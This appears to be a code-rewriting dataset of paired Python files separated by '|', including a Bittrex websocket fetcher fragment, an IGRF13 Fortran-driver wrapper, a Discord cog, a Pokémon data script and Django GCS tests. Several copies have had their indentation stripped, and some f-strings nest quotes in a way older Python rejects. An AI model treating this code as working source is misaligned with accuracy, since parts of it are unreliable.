WS_SUB_LIST_REDIS_KEY, ws_sub_redis_key
)
self.redis_client.hset(
ws_sub_redis_key, timestamp, sub_val)
current_timestamp = self.redis_client.hget(
ws_serve_redis_key, 'time')
if current_timestamp is None or \
timestamp >= int(current_timestamp):
self.redis_client.hset(
ws_serve_redis_key,
mapping = {
'time': timestamp,
'open': open_,
'high': high_,
'low': low_,
'close': close_,
'volume': volume_
}
)
except Exception as exc:
self.logger.warning(
f"Bittrex WS Fethcer: EXCEPTION: {exc}")
async def decode_message(self, title, msg) -> None:
decoded_msg = await self.process_message(msg[0])
return decoded_msg
async def process_message(self, message) -> None:
try:
decompressed_msg = decompress(
b64decode(message, validate=True), -MAX_WBITS)
except SyntaxError:
decompressed_msg = decompress(b64decode(message, validate=True))
return json.loads(decompressed_msg.decode())
async def subscribe(self, symbols: Iterable) -> NoReturn:
'''
Subscribes to WS channels of `symbols`
'''
while True:
try:
now = redis_time(self.redis_client)
if self.signalr_hub is None \
or (now - self.latest_ts) > 60 \
or (not self.subscription_success):
await self._connect()
if API_SECRET != '':
await self._authenticate()
else:
self.logger.info('Authentication skipped because API key was not provided')
await self._subscribe(symbols)
# Not sure what kind of exception we will encounter
except (ConnectionClosed, InvalidStatusCode) as exc:
self.logger.warning(
f"Connection raised exception: {exc} - reconnecting..."
)
await asyncio.sleep(min(self.backoff_delay, BACKOFF_MAX_SECS))
self.backoff_delay *= (1+random.random()) # add a random factor
# Sleep to release event loop
await asyncio.sleep(0.01)
async def all(self) -> NoReturn:
self.rest_fetcher.fetch_symbol_data()
symbols = tuple(self.rest_fetcher.symbol_data.keys())
await asyncio.gather(self.subscribe(symbols))
async def mutual_basequote(self) -> NoReturn:
'''
Subscribes to WS channels of the mutual symbols
among all exchanges
'''
symbols_dict = self.rest_fetcher.get_symbols_from_exch(MUTUAL_BASE_QUOTE_QUERY)
await asyncio.gather(self.subscribe(symbols_dict.keys()))
def run_mutual_basequote(self) -> None:
# loop = asyncio.get_event_loop()
# if loop.is_closed():
# asyncio.set_event_loop(asyncio.new_event_loop())
# loop = asyncio.get_event_loop()
# try:
# loop.create_task(self.mutual_basequote())
# loop.run_forever()
# finally:
# loop.close()
asyncio.run(self.mutual_basequote())
def run_all(self) -> None:
asyncio.run(self.all())
|
import xarray
from datetime import datetime
import numpy as np
import subprocess
import shutil
import os
from pathlib import Path
import importlib.resources
from .utils import mag_vector2incl_decl, datetime2yeardec
def cmake(setup_file: Path):
    """
    Attempt to build the Fortran driver by running the CTest script.

    Parameters
    ----------
    setup_file: Path
        path to the ``setup.cmake`` CTest script to execute

    Raises
    ------
    FileNotFoundError
        if the ``ctest`` executable is not on PATH
    subprocess.CalledProcessError
        if the build run fails
    """
    exe = shutil.which("ctest")
    if not exe:
        # FIX: the message previously said "CMake not available", but it is
        # specifically `ctest` (shipped with CMake) that is being looked up.
        raise FileNotFoundError("ctest (CMake) not available")
    subprocess.check_call([exe, "-S", str(setup_file), "-VV"])
def build_exe(exe_name: str) -> str:
    """
    Return the (platform-adjusted) name of the IGRF13 driver executable,
    building it with CMake on first use if it is not yet packaged.

    Raises ModuleNotFoundError if the build did not produce the executable.
    """
    if os.name == "nt":
        exe_name += ".exe"
    # Build on first run: invoke CMake if the compiled driver isn't present.
    if not importlib.resources.is_resource(__package__, exe_name):
        with importlib.resources.path(__package__, "setup.cmake") as setup_file:
            cmake(setup_file)
    if not importlib.resources.is_resource(__package__, exe_name):
        # FIX: copy-paste error — this package builds the IGRF13 driver,
        # not the MSISE00 one the old message referred to.
        raise ModuleNotFoundError("could not build IGRF13 Fortran driver")
    return exe_name
def grid(
    time: datetime,
    glat: np.ndarray,
    glon: np.ndarray,
    alt_km: np.ndarray,
    *,
    isv: int = 0,
    itype: int = 1,
) -> xarray.Dataset:
    """
    Evaluate the IGRF13 model over a latitude/longitude grid by invoking the
    Fortran driver once per (lat, lon) point.

    Parameters
    ----------
    time: datetime
        time of the evaluation (converted to a decimal year)
    glat, glon: np.ndarray
        geographic latitude/longitude, either matching 1-D vectors or a
        2-D meshgrid pair
    alt_km: np.ndarray
        altitude [km]; NOTE(review): the whole array is stringified into a
        single argv token below — the driver presumably expects one scalar
        altitude, so confirm callers pass a scalar here.
    isv: int
        0 for the main geomagnetic field
    itype: int
        1: altitude is above sea level

    Returns
    -------
    xarray.Dataset with north/east/down/total field components plus
    inclination and declination on the (glat, glon) grid.
    """
    glat = np.atleast_1d(glat)
    glon = np.atleast_1d(glon)
    yeardec = datetime2yeardec(time)
    # Flat output buffers; one driver call fills one element of each.
    x = np.empty(glat.size)
    y = np.empty_like(x)
    z = np.empty_like(x)
    f = np.empty_like(x)
    with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
        for i, (la, lo) in enumerate(zip(glat.ravel(), glon.ravel())):
            cmd = [str(exe), str(yeardec), str(la), str(lo), str(alt_km), str(isv), str(itype)]
            ret = subprocess.run(
                cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
            )
            if ret.returncode != 0:
                raise RuntimeError(
                    f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{" ".join(cmd)}"
                )
            # different compilers throw in extra \n
            x[i], y[i], z[i], f[i] = list(map(float, ret.stdout.split()))
    # %% assemble output
    if glat.ndim == 2 and glon.ndim == 2:  # assume meshgrid
        coords = {"glat": glat[:, 0], "glon": glon[0, :]}
    elif glat.ndim == 1 and glon.ndim == 1:
        coords = {"glat": glat, "glon": glon}
    else:
        raise ValueError(f"glat/glon shapes: {glat.shape} {glon.shape}")
    mag = xarray.Dataset(coords=coords, attrs={"time": time, "isv": isv, "itype": itype})
    mag["north"] = (("glat", "glon"), x.reshape(glat.shape))
    mag["east"] = (("glat", "glon"), y.reshape(glat.shape))
    mag["down"] = (("glat", "glon"), z.reshape(glat.shape))
    mag["total"] = (("glat", "glon"), f.reshape(glat.shape))
    decl, incl = mag_vector2incl_decl(mag.north, mag.east, mag.down)
    mag["incl"] = (("glat", "glon"), incl)
    mag["decl"] = (("glat", "glon"), decl)
    return mag
def igrf(
    time: datetime, glat: float, glon: float, alt_km: np.ndarray, *, isv: int = 0, itype: int = 1,
) -> xarray.Dataset:
    """
    Evaluate IGRF13 at one geographic location over an altitude profile,
    invoking the Fortran driver once per altitude.

    Parameters
    ----------
    time: datetime
        time of evaluation (converted to decimal year yyyy.dddd)
    glat, glon: float
        geographic Latitude, Longitude
    alt_km: np.ndarray
        altitude(s) [km] above sea level for itype==1
    isv: int
        0 for main geomagnetic field
    itype: int
        1: altitude is above sea level

    Returns
    -------
    xarray.Dataset indexed by alt_km with north/east/down/total components
    plus inclination and declination.
    """
    # decimal year
    yeardec = datetime2yeardec(time)
    alt_km = np.atleast_1d(alt_km)
    # One output slot per requested altitude.
    Bnorth = np.empty(alt_km.size)
    Beast = np.empty_like(Bnorth)
    Bvert = np.empty_like(Bnorth)
    Btotal = np.empty_like(Bnorth)
    with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
        for i, a in enumerate(alt_km):
            cmd = [str(exe), str(yeardec), str(glat), str(glon), str(a), str(isv), str(itype)]
            ret = subprocess.run(
                cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
            )
            if ret.returncode != 0:
                raise RuntimeError(
                    f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{" ".join(cmd)}"
                )
            # different compilers throw in extra \n
            Bnorth[i], Beast[i], Bvert[i], Btotal[i] = list(map(float, ret.stdout.split()))
    # %% assemble output
    decl, incl = mag_vector2incl_decl(Bnorth, Beast, Bvert)
    mag = xarray.Dataset(
        {
            "north": ("alt_km", Bnorth),
            "east": ("alt_km", Beast),
            "down": ("alt_km", Bvert),
            "total": ("alt_km", Btotal),
            "incl": ("alt_km", incl),
            "decl": ("alt_km", decl),
        },
        coords={"alt_km": alt_km},
        attrs={"time": time, "isv": isv, "itype": itype, "glat": glat, "glon": glon},
    )
    return mag
| import xarray
from datetime import datetime
import numpy as np
import subprocess
import shutil
import os
from pathlib import Path
import importlib.resources
from .utils import mag_vector2incl_decl, datetime2yeardec
def cmake(setup_file: Path):
    """
    Attempt to build the Fortran driver by running the CTest script.

    Raises FileNotFoundError if ``ctest`` is not on PATH, and
    subprocess.CalledProcessError if the build run fails.
    """
    exe = shutil.which("ctest")
    if not exe:
        # FIX: the message previously said "CMake not available", but it is
        # specifically `ctest` (shipped with CMake) that is being looked up.
        raise FileNotFoundError("ctest (CMake) not available")
    subprocess.check_call([exe, "-S", str(setup_file), "-VV"])
def build_exe(exe_name: str) -> str:
    """
    Return the (platform-adjusted) name of the IGRF13 driver executable,
    building it with CMake on first use if it is not yet packaged.

    Raises ModuleNotFoundError if the build did not produce the executable.
    """
    if os.name == "nt":
        exe_name += ".exe"
    # Build on first run: invoke CMake if the compiled driver isn't present.
    if not importlib.resources.is_resource(__package__, exe_name):
        with importlib.resources.path(__package__, "setup.cmake") as setup_file:
            cmake(setup_file)
    if not importlib.resources.is_resource(__package__, exe_name):
        # FIX: copy-paste error — this package builds the IGRF13 driver,
        # not the MSISE00 one the old message referred to.
        raise ModuleNotFoundError("could not build IGRF13 Fortran driver")
    return exe_name
def grid(
time: datetime,
glat: np.ndarray,
glon: np.ndarray,
alt_km: np.ndarray,
*,
isv: int = 0,
itype: int = 1,
) -> xarray.Dataset:
glat = np.atleast_1d(glat)
glon = np.atleast_1d(glon)
yeardec = datetime2yeardec(time)
x = np.empty(glat.size)
y = np.empty_like(x)
z = np.empty_like(x)
f = np.empty_like(x)
with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
for i, (la, lo) in enumerate(zip(glat.ravel(), glon.ravel())):
cmd = [str(exe), str(yeardec), str(la), str(lo), str(alt_km), str(isv), str(itype)]
ret = subprocess.run(
cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if ret.returncode != 0:
raise RuntimeError(
f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{' '.join(cmd)}"
)
# different compilers throw in extra \n
x[i], y[i], z[i], f[i] = list(map(float, ret.stdout.split()))
# %% assemble output
if glat.ndim == 2 and glon.ndim == 2: # assume meshgrid
coords = {"glat": glat[:, 0], "glon": glon[0, :]}
elif glat.ndim == 1 and glon.ndim == 1:
coords = {"glat": glat, "glon": glon}
else:
raise ValueError(f"glat/glon shapes: {glat.shape} {glon.shape}")
mag = xarray.Dataset(coords=coords, attrs={"time": time, "isv": isv, "itype": itype})
mag["north"] = (("glat", "glon"), x.reshape(glat.shape))
mag["east"] = (("glat", "glon"), y.reshape(glat.shape))
mag["down"] = (("glat", "glon"), z.reshape(glat.shape))
mag["total"] = (("glat", "glon"), f.reshape(glat.shape))
decl, incl = mag_vector2incl_decl(mag.north, mag.east, mag.down)
mag["incl"] = (("glat", "glon"), incl)
mag["decl"] = (("glat", "glon"), decl)
return mag
def igrf(
time: datetime, glat: float, glon: float, alt_km: np.ndarray, *, isv: int = 0, itype: int = 1,
) -> xarray.Dataset:
"""
Parameters
----------
date: datetime.date or decimal year yyyy.dddd
glat, glon: geographic Latitude, Longitude
alt_km: altitude [km] above sea level for itype==1
isv: 0 for main geomagnetic field
itype: 1: altitude is above sea level
"""
# decimal year
yeardec = datetime2yeardec(time)
alt_km = np.atleast_1d(alt_km)
Bnorth = np.empty(alt_km.size)
Beast = np.empty_like(Bnorth)
Bvert = np.empty_like(Bnorth)
Btotal = np.empty_like(Bnorth)
with importlib.resources.path(__package__, build_exe("igrf13_driver")) as exe:
for i, a in enumerate(alt_km):
cmd = [str(exe), str(yeardec), str(glat), str(glon), str(a), str(isv), str(itype)]
ret = subprocess.run(
cmd, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
if ret.returncode != 0:
raise RuntimeError(
f"IGRF13 error code {ret.returncode}\n{ret.stderr}\n{' '.join(cmd)}"
)
# different compilers throw in extra \n
Bnorth[i], Beast[i], Bvert[i], Btotal[i] = list(map(float, ret.stdout.split()))
# %% assemble output
decl, incl = mag_vector2incl_decl(Bnorth, Beast, Bvert)
mag = xarray.Dataset(
{
"north": ("alt_km", Bnorth),
"east": ("alt_km", Beast),
"down": ("alt_km", Bvert),
"total": ("alt_km", Btotal),
"incl": ("alt_km", incl),
"decl": ("alt_km", decl),
},
coords={"alt_km": alt_km},
attrs={"time": time, "isv": isv, "itype": itype, "glat": glat, "glon": glon},
)
return mag
|
from discord.ext import commands
import datetime
from discord.ext.commands.errors import MissingRequiredArgument, CommandNotFound
class Manager(commands.Cog):
    """Housekeeping cog: startup logging, self-message filtering and
    user-friendly command-error replies."""
    def __init__(self, bot):
        self.bot = bot
    @commands.Cog.listener()
    async def on_ready(self):
        """Log the connected account and the connection timestamp."""
        print(f'Estamos conectados como {self.bot.user}')
        started = datetime.datetime.now().strftime('%d/%m/%Y às %H:%M:%S')
        print(f'Conexão iniciada: {started}')
        print(f">{'-' * 34}<")
    @commands.Cog.listener()
    async def on_message(self, message):
        """Ignore the bot's own messages; everything else falls through."""
        if message.author == self.bot.user:
            return
    @commands.Cog.listener()
    async def on_command_error(self, ctx, error):
        """Reply with a hint for known user errors; re-raise anything else."""
        replies = (
            (MissingRequiredArgument, "Favor enviar todos os Argumentos. Digite \\help para ver os parâmetros de cada comando"),
            (CommandNotFound, "O comando não existe. Digite \\help para ver todos os comandos"),
        )
        for exc_type, reply in replies:
            if isinstance(error, exc_type):
                await ctx.send(reply)
                return
        raise error
def setup(bot):
    """discord.py extension entry point: register the Manager cog on *bot*."""
    cog = Manager(bot)
    bot.add_cog(cog)
| from discord.ext import commands
import datetime
from discord.ext.commands.errors import MissingRequiredArgument, CommandNotFound
class Manager(commands.Cog):
""" Manage the bot """
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
print(f'Estamos conectados como {self.bot.user}')
now = datetime.datetime.now()
print(f'Conexão iniciada: {now.strftime("%d/%m/%Y às %H:%M:%S")}')
print('>' + '-'*34 + '<')
@commands.Cog.listener()
async def on_message(self, message):
if message.author == self.bot.user:
return
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if isinstance(error, MissingRequiredArgument):
await ctx.send("Favor enviar todos os Argumentos. Digite \\help para ver os parâmetros de cada comando")
elif isinstance(error, CommandNotFound):
await ctx.send("O comando não existe. Digite \\help para ver todos os comandos")
else:
raise error
def setup(bot):
bot.add_cog(Manager(bot))
|
import random
import time
import sys
numeros = []
def juntar(lst, string):
    """Return the items of *lst* joined into one string, separated by *string*.

    Both the separator and the items are coerced with str() first.
    """
    sep = str(string)
    pieces = [str(item) for item in lst]
    return sep.join(pieces)
def sortear(lista):
    """Append five random integers in [0, 100] to *lista* in place,
    printing them one per second on a single comma-separated line."""
    print('A gerar valores para a lista: ', end='')
    for idx in range(5):
        valor = random.randint(0, 100)
        lista.append(valor)
        sys.stdout.flush()
        time.sleep(1)
        # Comma-separate the first four values, newline after the last.
        terminador = ', ' if idx < 4 else '\n'
        print(valor, end=terminador)
def somapar(lista):
    """Print how many values of *lista* are even, which ones, and their sum."""
    pares = [valor for valor in lista if valor % 2 == 0]
    soma = sum(pares)
    print(f'''Dos valores gerados, {len(pares)} eram pares ({juntar(pares, ', ')}) e a sua soma é {soma}''')
sortear(numeros)
somapar(numeros) | import random
import time
import sys
numeros = []
def juntar(lst, string):
lst = str(string).join(str(x) for x in lst)
return lst
def sortear(lista):
print('A gerar valores para a lista: ', end='')
for c1 in range(0, 5):
n = random.randint(0, 100)
lista += [n]
sys.stdout.flush()
time.sleep(1)
if c1 < 4:
print(n, end=', ')
else:
print(n)
def somapar(lista):
s = 0
np = []
for i1 in lista:
if i1 % 2 == 0:
s += i1
np += [i1]
print(f'''Dos valores gerados, {len(np)} eram pares ({juntar(np, ', ')}) e a sua soma é {s}''')
sortear(numeros)
somapar(numeros) |
import asyncio
# driver = webdriver.Chrome(executable_path=r"chromedriver.exe")
import json
from io import BytesIO
# import aiohttp
# import bs4
# import html5lib
# from bs4 import BeautifulSoup
# from selenium import webdriver
URL = "https://pokemondb.net/pokedex/all"
CDNURL = "https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{}.png"
POKEDEX = "https://img.pokemondb.net/artwork/{}"
EVOLVE = "https://pokemondb.net/evolution/level"
SHINY = "https://pokemondb.net/pokedex/shiny"
# DOESNT DO MEGAS ETC.
async def main():
    """One-off data munge: merge pokedex/legendary/mythical entries, turn the
    pokemon on the hard-coded MEGAS id list into boosted "Mega" variants
    (+50 to every base stat, fixed low spawnchance) and write them to
    pokecord/data/megas.json."""
    # # a = {"mega": [], "normal": [], "all": {}}
    # driver.get(SHINY)
    # await asyncio.sleep(10)
    # soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
    # da = soup.find_all("div", {"class": "infocard-list infocard-list-pkmn-lg"})
    # a = []
    # for div in da:
    #     tags = div.find_all("div", {"class": "infocard"})
    #     for poke in tags:
    #         if len(poke.find_all("small")) == 2:
    #             num = int(poke.find("small").get_text().replace("#", ""))
    #             print(num)
    #             img = poke.find_all("img")
    #             if not img:
    #                 print(img)
    #             img = img[1].attrs["src"]
    #             a.append([num, img])
    # await write(a, "shiny")
    # with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
    #     a = json.load(f)
    print(2)
    with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
        p = json.load(f)
    with open(f"pokecord/data/legendary.json", "r", encoding="utf-8") as f:
        l = json.load(f)
    with open(f"pokecord/data/mythical.json", "r", encoding="utf-8") as f:
        m = json.load(f)
    # All known pokemon, regular + legendary + mythical.
    data = p + l + m
    a = []
    # National-dex ids of pokemon that have a Mega evolution.
    MEGAS = [
        3,
        6,
        9,
        64,
        94,
        115,
        127,
        130,
        142,
        150,
        181,
        212,
        214,
        229,
        248,
        257,
        282,
        303,
        306,
        308,
        310,
        354,
        359,
        380,
        381,
        445,
        448,
        460,
        15,
        18,
        80,
        208,
        254,
        302,
        319,
        323,
        334,
        362,
        373,
        376,
        384,
        428,
        475,
        531,
        719,
    ]
    for pokemon in data:
        if pokemon["id"] in MEGAS:
            # Mutates the loaded entry in place before collecting it.
            pokemon["variant"] = "Mega"
            for stat in pokemon["stats"]:
                pokemon["stats"][stat] += 50
            pokemon["spawnchance"] = 0.001
            pokemon["alias"] = f"Mega {pokemon["name"]["english"]}"
            a.append(pokemon)
    await write(a, "megas")
async def get_img():
    """Download the artwork PNG for every pokedex entry (by zero-padded id)
    and every shiny entry (by stored url) into pokecord/data/pokemon/.

    NOTE(review): `aiohttp` is only imported in a commented-out line at the
    top of this file, so calling this coroutine as-is raises NameError —
    re-enable that import before use.
    """
    session = aiohttp.ClientSession()
    with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
        data = json.load(f)
    for pokemon in data:
        img = await session.get(
            f"https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{str(pokemon["id"]).zfill(3)}.png"
        )
        name = f"pokecord/data/pokemon/{pokemon["name"]["english"]}.png"
        with open(name, "wb") as f:
            f.write(BytesIO(await img.read()).getbuffer())
    with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
        data = json.load(f)
    for pokemon in data:
        img = await session.get(pokemon["url"])
        name = f"pokecord/data/pokemon/{pokemon["alias"]}.png"
        with open(name, "wb") as f:
            f.write(BytesIO(await img.read()).getbuffer())
    await session.close()
async def evolve():
    """Scrape the level-evolution table from pokemondb and write a
    {name: {"evolution": next_name, "level": lvl}} map to evolve.json.

    NOTE(review): `driver` (selenium), `bs4` and `BeautifulSoup` are only
    imported in commented-out lines at the top of this file, so calling this
    coroutine as-is raises NameError. The `parse` variable below is also
    never used.
    """
    a = {}
    driver.get(EVOLVE)
    parse = BeautifulSoup(driver.page_source, "html5lib")
    await asyncio.sleep(3)
    soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
    table = soup.find("table", {"id": "evolution"})
    evolves = table.find_all("tr")
    # Skip the header row; each remaining row is one evolution pair.
    for tag in evolves[1:]:
        pokes = tag.find_all("span", {"class": "infocard-cell-data"})
        lvl = tag.find("td", {"class": "cell-num"})
        if lvl is None:
            break
        names = []
        for pokemon in pokes:
            small = pokemon.find("small", {"class": "text-muted"})
            if small is None:
                small = pokemon.find("a")
            names.append(small.get_text())
        a[names[0]] = {"evolution": names[1], "level": lvl.get_text()}
    await write(a, "evolve")
async def write(lst, name):
    """Serialize *lst* as JSON (indent=1) to pokecord/data/<name>.json."""
    target = f"pokecord/data/{name}.json"
    payload = json.dumps(lst, indent=1)
    with open(target, "w") as fh:
        fh.write(payload)
def spawn_rate():
    """Recompute each pokemon's spawnchance in pokedex.json, in place.

    spawnchance = (800 - sum of base stats) / 800, so weaker pokemon
    spawn more often. Reads and rewrites pokecord/data/pokedex.json.
    """
    with open("pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
        data = json.load(f)
    for pokemon in data:
        # FIX: the original also accumulated (800 - total) into a `stats`
        # list that was never read; that dead code is removed.
        total = sum(pokemon["stats"].values())
        pokemon["spawnchance"] = (800 - total) / 800
    with open("pokecord/data/pokedex.json", "w") as f:
        f.write(json.dumps(data))
# Script entry point: run the one-off data-munging coroutine.
# asyncio.run() replaces the deprecated get_event_loop()/run_until_complete
# pattern and guarantees the loop is closed afterwards.
asyncio.run(main())
| import asyncio
# driver = webdriver.Chrome(executable_path=r"chromedriver.exe")
import json
from io import BytesIO
# import aiohttp
# import bs4
# import html5lib
# from bs4 import BeautifulSoup
# from selenium import webdriver
URL = "https://pokemondb.net/pokedex/all"
CDNURL = "https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{}.png"
POKEDEX = "https://img.pokemondb.net/artwork/{}"
EVOLVE = "https://pokemondb.net/evolution/level"
SHINY = "https://pokemondb.net/pokedex/shiny"
# DOESNT DO MEGAS ETC.
async def main():
    """Build megas.json from the combined pokedex/legendary/mythical data.

    Every pokemon whose dex id appears in MEGAS gets +50 to each base stat,
    a fixed 0.001 spawn chance, and a "Mega <name>" alias, and is collected
    into megas.json via write().
    """
    # The commented block below was a one-off scrape of the shiny-sprite
    # listing page; kept for reference.
    # # a = {"mega": [], "normal": [], "all": {}}
    # driver.get(SHINY)
    # await asyncio.sleep(10)
    # soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
    # da = soup.find_all("div", {"class": "infocard-list infocard-list-pkmn-lg"})
    # a = []
    # for div in da:
    #     tags = div.find_all("div", {"class": "infocard"})
    #     for poke in tags:
    #         if len(poke.find_all("small")) == 2:
    #             num = int(poke.find("small").get_text().replace("#", ""))
    #             print(num)
    #             img = poke.find_all("img")
    #             if not img:
    #                 print(img)
    #             img = img[1].attrs["src"]
    #             a.append([num, img])
    # await write(a, "shiny")
    # with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
    #     a = json.load(f)
    print(2)  # debug marker left by the author
    with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
        p = json.load(f)
    with open(f"pokecord/data/legendary.json", "r", encoding="utf-8") as f:
        l = json.load(f)
    with open(f"pokecord/data/mythical.json", "r", encoding="utf-8") as f:
        m = json.load(f)
    data = p + l + m
    a = []
    # Dex ids of every species given a Mega form here.
    MEGAS = [
        3, 6, 9, 64, 94, 115, 127, 130, 142, 150, 181, 212, 214, 229,
        248, 257, 282, 303, 306, 308, 310, 354, 359, 380, 381, 445, 448,
        460, 15, 18, 80, 208, 254, 302, 319, 323, 334, 362, 373, 376,
        384, 428, 475, 531, 719,
    ]
    for pokemon in data:
        if pokemon["id"] in MEGAS:
            pokemon["variant"] = "Mega"
            for stat in pokemon["stats"]:
                pokemon["stats"][stat] += 50
            pokemon["spawnchance"] = 0.001
            pokemon["alias"] = f"Mega {pokemon['name']['english']}"
            a.append(pokemon)
    await write(a, "megas")
async def get_img():
    """Download artwork for every pokedex entry plus every shiny sprite.

    Images are written to pokecord/data/pokemon/ named after the pokemon's
    English name (or its shiny alias).
    """
    session = aiohttp.ClientSession()
    with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
        data = json.load(f)
    for pokemon in data:
        # The official artwork CDN keys on the zero-padded 3-digit dex id.
        img = await session.get(
            f"https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{str(pokemon['id']).zfill(3)}.png"
        )
        name = f"pokecord/data/pokemon/{pokemon['name']['english']}.png"
        with open(name, "wb") as f:
            f.write(BytesIO(await img.read()).getbuffer())
    with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
        data = json.load(f)
    for pokemon in data:
        # Shiny entries carry their own direct sprite URL.
        img = await session.get(pokemon["url"])
        name = f"pokecord/data/pokemon/{pokemon['alias']}.png"
        with open(name, "wb") as f:
            f.write(BytesIO(await img.read()).getbuffer())
    await session.close()
async def evolve():
    """Scrape pokemondb's level-up evolution table into evolve.json.

    NOTE(review): relies on module-level `driver` (selenium) and the
    bs4/BeautifulSoup imports, which are commented out at the top of this
    file — confirm they are re-enabled before running.
    """
    a = {}
    driver.get(EVOLVE)
    parse = BeautifulSoup(driver.page_source, "html5lib")  # parsed but unused
    await asyncio.sleep(3)
    soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
    table = soup.find("table", {"id": "evolution"})
    evolves = table.find_all("tr")
    for tag in evolves[1:]:  # skip the header row
        pokes = tag.find_all("span", {"class": "infocard-cell-data"})
        lvl = tag.find("td", {"class": "cell-num"})
        if lvl is None:
            break
        names = []
        for pokemon in pokes:
            small = pokemon.find("small", {"class": "text-muted"})
            if small is None:
                small = pokemon.find("a")
            names.append(small.get_text())
        # names[0] evolves into names[1] at the scraped level.
        a[names[0]] = {"evolution": names[1], "level": lvl.get_text()}
    await write(a, "evolve")
async def write(lst, name):
    """Serialize *lst* as JSON into pokecord/data/<name>.json."""
    with open(f"pokecord/data/{name}.json", "w") as f:
        json.dump(lst, f, indent=1)
def spawn_rate():
    """Recompute each pokemon's spawn chance from its base-stat total.

    Reads pokecord/data/pokedex.json, sets
    spawnchance = (800 - sum of base stats) / 800 on every entry,
    and writes the file back in place.
    """
    # Plain string literals: the originals carried a pointless f-prefix.
    with open("pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
        data = json.load(f)
    for pokemon in data:
        # sum() over the stat values replaces the manual accumulator loop;
        # the original also built an unused `stats` list, dropped here.
        total = sum(pokemon["stats"].values())
        pokemon["spawnchance"] = (800 - total) / 800
    with open("pokecord/data/pokedex.json", "w") as f:
        json.dump(data, f)
# Script entry point: drive the async scraper to completion.
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
|
from unittest import skipIf
from decouple import config
from django.test import TestCase, override_settings
from google.api_core.client_options import ClientOptions
from google.auth.credentials import AnonymousCredentials
from google.cloud.exceptions import NotFound
from google.cloud.storage import Blob, Bucket, Client
from physionet.gcs import GCSObject, GCSObjectException
from physionet.settings.base import StorageTypes
# Integration tests run only when a fake GCS server host is configured
# (see the skipIf guard on the test class below).
TEST_GCS_INTEGRATION = config('TEST_GCS_INTEGRATION', default=True, cast=bool)
GCS_HOST = config('GCS_HOST', default=None)
@skipIf(
    (GCS_HOST is None or not TEST_GCS_INTEGRATION),
    'Test GCS-backend integration only on dockerized CI/CD pipeline.',
)
@override_settings(
    STORAGE_TYPE=StorageTypes.GCP,
    DEFAULT_FILE_STORAGE='physionet.storage.MediaStorage',
    STATICFILES_STORAGE='physionet.storage.StaticStorage',
    GCP_STORAGE_BUCKET_NAME='physionet-media',
    GCP_STATIC_BUCKET_NAME='physionet-static',
    GS_PROJECT_ID='test_project_id',
    GCP_BUCKET_LOCATION='us-west1',
)
class TestGCSObject(TestCase):
    """Integration tests for GCSObject against a local fake-GCS server.

    Every GCSObject under test has its storage client monkeypatched to
    talk to the emulator endpoint instead of real GCS.
    """

    @classmethod
    def setUpTestData(cls):
        # Double quotes inside the replacement field: reusing the outer
        # quote in an f-string is a SyntaxError before Python 3.12.
        cls.gcs_server_endpoint = f'http://{config("GCS_HOST", default="gcs")}:4443'
        cls.bucket_name = 'test'
        cls.path = 'physionet/users/admin/profile.jpg'

    def tearDown(self):
        # Buckets persist on the emulator between tests; drop them here.
        try:
            self._clear_gcs_bucket(self.bucket_name)
        except NotFound:
            pass

    def _clear_gcs_bucket(self, name):
        self._get_gcs_client().get_bucket(name).delete(force=True)

    def _get_gcs_client(self):
        # Anonymous credentials are sufficient for the emulator endpoint.
        return Client(
            project="test_project_id",
            credentials=AnonymousCredentials(),
            client_options=ClientOptions(api_endpoint=self.gcs_server_endpoint),
        )

    def _monkeypatch_gcsobject(self, gcs_object):
        # Redirect the object's cached storage client at the emulator.
        gcs_object._storage._client = self._get_gcs_client()
        return gcs_object

    @override_settings(STORAGE_TYPE=StorageTypes.LOCAL)
    def test_init_raises_exception_when_storage_types_is_local(self):
        self.assertRaises(GCSObjectException, GCSObject, self.path)

    @override_settings(STORAGE_TYPE=StorageTypes.GCP)
    def test_init_when_storage_type_is_gcp(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertEqual(gcs_object.bucket.name, 'physionet')
        self.assertEqual(gcs_object._object_name, 'users/admin/profile.jpg')

    def test_repr(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertEqual(
            repr(gcs_object),
            'GCSObject(Bucket=physionet, Object="users/admin/profile.jpg")',
        )

    def test_bucket_property_return_bucket_proper_object(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertIsInstance(gcs_object.bucket, Bucket)
        self.assertEqual(gcs_object.bucket.name, 'physionet')

    def test_blob_property_return_proper_object(self):
        gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
        self.assertIsInstance(gcs_object.blob, Blob)
        self.assertEqual(gcs_object.blob.name, 'users/admin/profile.jpg')

    def test_mkdir_makes_directories(self):
        # GIVEN
